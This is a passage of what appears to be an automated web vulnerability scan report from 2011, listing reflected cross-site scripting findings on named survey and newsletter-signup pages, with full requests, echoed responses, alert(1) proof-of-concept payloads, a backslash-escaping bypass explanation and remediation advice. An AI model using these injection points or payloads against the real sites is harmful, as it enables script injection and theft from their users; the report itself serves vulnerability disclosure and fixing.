HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:21 GMT Server: Apache-AdvancedExtranetServer/2.0.50 X-Powered-By: PHP/4.3.8 Set-Cookie: veranda_ses=deleted; expires=Fri, 17-Sep-2010 14:47:20 GMT; path=/; domain=.questionmarket.com P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Content-Length: 385 Content-Type: text/html
(function(){ if (self==top) { if (window.opener) document.write('<a href="javascript:window.close()">Click to Close</a>'); } else { document.write('<a href="http://amch.questionmarket.com/adscgen/endsurvey_disq.php">Continue to your destina/33fea\\';alert(1)//008a4b6b504tion</a> ...[SNIP]...
|
5.12. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p1 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/surv_lastpage_disq.php |
Issue detail
The value of the p1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28379\'%3balert(1)//48eea5b6e22 was submitted in the p1 parameter. This input was echoed as 28379\\';alert(1)//48eea5b6e22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close28379\'%3balert(1)//48eea5b6e22&p2=Continue+to+your+destination HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:42:15 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:42:14 GMT; path=/; domain=.questionmarket.com P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Content-Length: 384 Content-Type: text/html
(function(){ if (self==top) { if (window.opener) document.write('<a href="javascript:window.close()">Click to Close28379\\';alert(1)//48eea5b6e22</a>'); } else { document.write('<a href="http://a ...[SNIP]...
|
5.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p2 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/surv_lastpage_disq.php |
Issue detail
The value of the p2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f855\'%3balert(1)//5a6ea17ffa6 was submitted in the p2 parameter. This input was echoed as 7f855\\';alert(1)//5a6ea17ffa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination7f855\'%3balert(1)//5a6ea17ffa6 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:42:48 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:42:47 GMT; path=/; domain=.questionmarket.com P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Content-Length: 384 Content-Type: text/html
(function(){ if (self==top) { if (window.opener) document.write('<a href="javascript:window.close()">Click to Close</a>'); } else { document.write('<a href="http://amch.questionmarket.com/adscgen/endsurvey_disq.php">Continue to your destination7f855\\';alert(1)//5a6ea17ffa6</a> ...[SNIP]...
|
5.14. http://amch.questionmarket.com/surveyf/nav.php [code parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73284"%3balert(1)//c45b9562948 was submitted in the code parameter. This input was echoed as 73284";alert(1)//c45b9562948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=92273873284"%3balert(1)//c45b9562948&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:51 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270271; expires=Wed, 21 Sep 2011 18:37:51 GMT; path=/; domain=.questionmarket.com Content-Length: 3868 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... pCountDown(); // Put together the URL for the survey
// Send the survey frame there parent.survey.location = "http://survey.questionmarket.com/surv/913131/ai_start.php?site=10&from_aicode=92273873284";alert(1)//c45b9562948";}
// Invoked by the Certification button on the invitation page function Certify(URL) { popupWin = window.open(URL, 'Participant', 'location,scrollbars,width=450,height=300') window.top.name = ' ...[SNIP]...
|
5.15. http://amch.questionmarket.com/surveyf/nav.php [link parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The value of the link request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d421d'%3balert(1)//bcd6ca1703 was submitted in the link parameter. This input was echoed as d421d';alert(1)//bcd6ca1703 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26d421d'%3balert(1)//bcd6ca1703&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:57 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270277; expires=Wed, 21 Sep 2011 18:37:57 GMT; path=/; domain=.questionmarket.com Content-Length: 3863 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... ;
function endSurvey() { send(); }
// Where the browser should go after the survey is finished var link = unescape('http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&d421d';alert(1)//bcd6ca1703'); // Where the browser came from before the survey var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&';
// Skip the survey function send() { top.window.locati ...[SNIP]...
|
5.16. http://amch.questionmarket.com/surveyf/nav.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75c64'%3balert(1)//3e77d42b39d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75c64';alert(1)//3e77d42b39d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cak/75c64'%3balert(1)//3e77d42b39de%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:38:05 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270285; expires=Wed, 21 Sep 2011 18:38:05 GMT; path=/; domain=.questionmarket.com Content-Length: 3865 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... .com/search/fast_search_recipes?search_term=xss sugar cake&'); // Where the browser came from before the survey var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cak/75c64';alert(1)//3e77d42b39de&';
// Skip the survey function send() { top.window.location.href = link; }
// Send the browser back where it came from function sendToOrigin() { top.window.location.href = origin; }
// Set up ...[SNIP]...
|
5.17. http://amch.questionmarket.com/surveyf/nav.php [orig parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The value of the orig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6606f'%3balert(1)//c12f3c25a95 was submitted in the orig parameter. This input was echoed as 6606f';alert(1)//c12f3c25a95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%266606f'%3balert(1)//c12f3c25a95 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:38:00 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270280; expires=Wed, 21 Sep 2011 18:38:00 GMT; path=/; domain=.questionmarket.com Content-Length: 3864 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... com/search/fast_search_recipes?search_term=xss sugar cake&'); // Where the browser came from before the survey var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&6606f';alert(1)//c12f3c25a95';
// Skip the survey function send() { top.window.location.href = link; }
// Send the browser back where it came from function sendToOrigin() { top.window.location.href = origin; }
// Set up t ...[SNIP]...
|
5.18. http://amch.questionmarket.com/surveyf/nav.php [survey_num parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The value of the survey_num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf2f"%3balert(1)//828815a93a3 was submitted in the survey_num parameter. This input was echoed as ecf2f";alert(1)//828815a93a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131ecf2f"%3balert(1)//828815a93a3&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:49 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270269; expires=Wed, 21 Sep 2011 18:37:49 GMT; path=/; domain=.questionmarket.com Content-Length: 3868 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... o_submit() { // Don't count down stopCountDown(); // Put together the URL for the survey
// Send the survey frame there parent.survey.location = "http://survey.questionmarket.com/surv/913131ecf2f";alert(1)//828815a93a3/ai_start.php?site=10&from_aicode=922738";}
// Invoked by the Certification button on the invitation page function Certify(URL) { popupWin = window.open(URL, 'Participant', 'location,scrollbars,widt ...[SNIP]...
|
5.19. http://amch.questionmarket.com/surveyf/nav.php [survey_server parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/surveyf/nav.php |
Issue detail
The value of the survey_server request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b499"%3balert(1)//900ed15e804 was submitted in the survey_server parameter. This input was echoed as 1b499";alert(1)//900ed15e804 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surveyf/nav.php?survey_server=survey.questionmarket.com1b499"%3balert(1)//900ed15e804&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:48 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Cache-Control: private, must-revalidate P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Set-Cookie: LP=1316270268; expires=Wed, 21 Sep 2011 18:37:48 GMT; path=/; domain=.questionmarket.com Content-Length: 3868 Content-Type: text/html; charset=utf-8
<html> <head> <style> body {margin:0; }
table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; } table.outersurveybar td {border-top:1px solid ...[SNIP]... n function do_submit() { // Don't count down stopCountDown(); // Put together the URL for the survey
// Send the survey frame there parent.survey.location = "http://survey.questionmarket.com1b499";alert(1)//900ed15e804/surv/913131/ai_start.php?site=10&from_aicode=922738";}
// Invoked by the Certification button on the invitation page function Certify(URL) { popupWin = window.open(URL, 'Participant', 'location,scr ...[SNIP]...
|
5.20. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bcompany%5D parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://app.streamsend.com |
| Path: |
/public/6EzE/J1l/subscribe |
Issue detail
The value of the person%5Bcompany%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a12"><script>alert(1)</script>9e198abd1c0 was submitted in the person%5Bcompany%5D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9 Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=42a12"><script>alert(1)</script>9e198abd1c0&commit=Sign+Up |
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:39 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 ETag: "1cf4c148e94db25c54b03c56dd91c804" X-Runtime: 210 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly Status: 200 Vary: Accept-Encoding Content-Length: 3578 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT ...[SNIP]... <input id="person_company" name="person[company]" size="30" type="text" value="42a12"><script>alert(1)</script>9e198abd1c0" /> ...[SNIP]...
|
